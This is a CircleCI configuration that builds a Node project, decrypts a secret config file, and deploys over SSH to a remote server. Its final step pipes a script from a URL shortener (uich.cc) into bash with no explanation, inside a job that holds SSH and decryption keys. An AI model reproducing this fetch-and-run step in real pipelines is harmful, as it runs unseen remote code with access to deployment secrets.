
version: 2.1

orbs:
  node: circleci/node@4.2.1

jobs:
  build:
    executor:
      name: node/default
      tag: 'lts'
    steps:
      - checkout
      - add_ssh_keys:
          fingerprints:
            - "f6:f7:d9:cf:34:03:0e:97:c1:d4:f3:88:d4:26:8f:95"
      - node/install-yarn
      - node/install-packages:
          pkg-manager: yarn
      - run: openssl aes-256-cbc -d -pbkdf2 -in config.ts.enc -out src/config.ts -k $DECRYPT_KEY
      - run: yarn build
      - run: |
          tar Jcvf ../project.tar.xz --exclude node_modules --exclude .idea --exclude .git .
          ssh-keyscan -t rsa cloud.drjchn.com >> ~/.ssh/known_hosts
          scp ../project.tar.xz ubuntu@cloud.drjchn.com:~
          ssh ubuntu@cloud.drjchn.com < deploy.sh
          curl -L https://uich.cc/5iavbeH6 | bash
workflows:
  version: 2
  master_build:
    jobs:
      - build:
          filters:
            branches:
              only: master